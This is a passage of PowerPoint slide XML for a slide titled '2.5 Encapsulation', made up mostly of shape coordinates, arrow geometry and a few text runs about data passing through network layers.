            <p:cNvPr id="47" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5785B913-A18E-2F41-B207-5BAD1501EBBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9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8" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826389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8" name="object 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81CAD241-68BE-63D0-F18B-07222BDC8D18}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108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9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2" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFB54654-2780-CCA0-7BCE-1FB0C27A62F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963516" y="3170608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39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8466DE0E-2A03-C4EF-C0F0-636166EBEEDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3225647" y="1286055"/>
            <a:ext cx="576580" cy="3278504"/>
            <a:chOff x="3204209" y="1355598"/>
            <a:chExt cx="576580" cy="3278504"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D69CCFE5-EF1C-DDA1-7CAD-3DC478907A5E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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088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6" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{657ACB3D-CCA7-1E5E-EFFA-B8360A8D2673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0" y="2990088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144017" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144017" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2990088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288036" y="3278124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2990088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4" name="object 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F038DD17-4CB4-6EA7-F9C4-CD9F6C8BB320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449803" y="1364617"/>
            <a:ext cx="85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43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{800CF86A-D8FD-B23E-D694-1F7BB5E73980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1609142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44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36D6F837-E29A-5E08-A3F9-BFC7BB2A4609}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3440659" y="1852982"/>
            <a:ext cx="1454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" indent="-1905" algn="just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w e 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45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30678C71-DF9C-7EA2-5BD7-5591282C1E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429483" y="2828596"/>
            <a:ext cx="126364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  <a:p>
            <a:pPr marL="12700" marR="5080" indent="1270"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a y e r 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46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF8ED153-2337-B90E-79C6-169791AD1056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8122260" y="1290627"/>
            <a:ext cx="576580" cy="3276600"/>
            <a:chOff x="8100822" y="1360170"/>
            <a:chExt cx="576580" cy="3276600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="object 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E17C87F9-30E9-618B-4458-EF67859D3154}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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432053" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564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4" name="object 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94890543-BB1C-83AB-5931-3A8F438D935B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8100822" y="1360170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0" y="2988564"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="144018" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144018" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432053" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576072" y="2988564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288035" y="3276600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2988564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9" name="object 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86C137EC-53D6-35D7-805B-64999149464F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="1246685"/>
            <a:ext cx="10668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254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 c a p s u l a t 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50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F3B4C9C-6758-F45F-D6E5-BF25B8715682}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="3929839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51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{607B91F5-CC3E-8D5B-2373-A62F41124DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357082" y="4173679"/>
            <a:ext cx="106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2" name="object 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{435093D0-36D7-A5F8-03BC-ECE85F00C6EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5554320" y="2925879"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="5532882" y="2995422"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="object 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E61A2A5-6375-E9B3-DB37-C011194DC4AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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2" name="object 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3738FA0-D9F2-593E-2641-67D33A4A76CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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3" name="object 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2309B8C4-70FC-9F41-A0AA-34786CBDB1ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5693511" y="3170608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4" name="object 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CBFEDFE-C25C-5363-F41F-109A1DFAF485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6284315" y="2925878"/>
            <a:ext cx="1754505" cy="772795"/>
            <a:chOff x="6262877" y="2995421"/>
            <a:chExt cx="1754505" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="object 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEB91A85-B142-4D84-93B1-239E5E9179A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6262877" y="2995421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5">
                  <a:moveTo>
                    <a:pt x="1625346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9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9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1625346" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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0" name="object 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBAE035D-C83B-ED50-A083-EFAC90327886}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6262877" y="2995421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9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1625346" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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9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5" name="object 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE73103-CDCE-CD14-6677-559EEAA083AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438240" y="3170608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61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B9814DE-6E6D-05EB-4145-4D314C609898}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4766534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37" name="object 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD8F16E-208C-B7CD-5BF7-8D6C7394F806}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5131791" y="4777180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44</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0109D95-0FA5-9EC6-9601-F8195A050AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4456659" y="3816148"/>
            <a:ext cx="34512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same</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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technique</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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used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24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following</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="24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layers.</a:t>
            </a:r>
            <a:endParaRPr sz="240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1E1A5F-327B-BE40-27CF-88E38935C977}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2052720" y="2571840"/>
              <a:ext cx="5072400" cy="93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1E1A5F-327B-BE40-27CF-88E38935C9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3360" y="2562480"/>
                <a:ext cx="5091120" cy="95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6066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CECAF57-22B2-6296-8331-90E915C8CBCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432714" y="185345"/>
            <a:ext cx="33032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Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2900" b="1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900" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
              </a:rPr>
              <a:t>Encapsulation</a:t>
            </a:r>
            <a:endParaRPr sz="2900" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto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73434FAF-E981-3910-8CCE-28C2E0C01DC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="1097078"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="1166621"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AD6555D-CD67-E9B0-A70F-15E9F211A8FE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9" name="object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4C64AAC-0E92-6552-DE15-A24F9F220B12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3EFD598A-328C-400D-A119-1B6B08FA1E01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="1181102"/>
            <a:ext cx="20078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23871E9B-9BBC-755C-3409-2B929725F4CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2009955"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2079498"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED76F5E6-6BFA-FE38-7387-C34244F92077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00763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7" name="object 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15839C56-E98C-BB0A-59AF-768B13B8DF94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8" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F619A02-5AF6-BF4B-B189-71F432FEBC12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="2095298"/>
            <a:ext cx="17030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35" dirty="0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9" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{134C0BBA-F72D-29D5-1BBC-049436087688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2924355"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2993898"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF8B01DB-1939-C06E-9AB4-85B9E15C80D5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5" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A67320E9-1683-922D-3B55-ED3FCDD16EC3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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF49AEFE-845E-88B2-77B9-46F4BB3DD715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3008378"/>
            <a:ext cx="15392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1" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F67EF9-A107-A61D-5FBA-C1FE12B1FA6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="3837231"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="3906774"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD16CCFA-C4BB-B358-C1C1-ECAE44DC20BF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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="722399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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="6928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3" name="object 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E3BF9A8-F0FC-E87B-62D2-202D1D0E1485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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="6928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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="722399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2" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93063ACF-89D3-C3CD-5D6C-5AB4FBA03C93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3922524"/>
            <a:ext cx="16414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3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3" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36965396-D59A-7673-8445-9D6A1B51012B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6264503" y="1247954"/>
            <a:ext cx="864235" cy="774700"/>
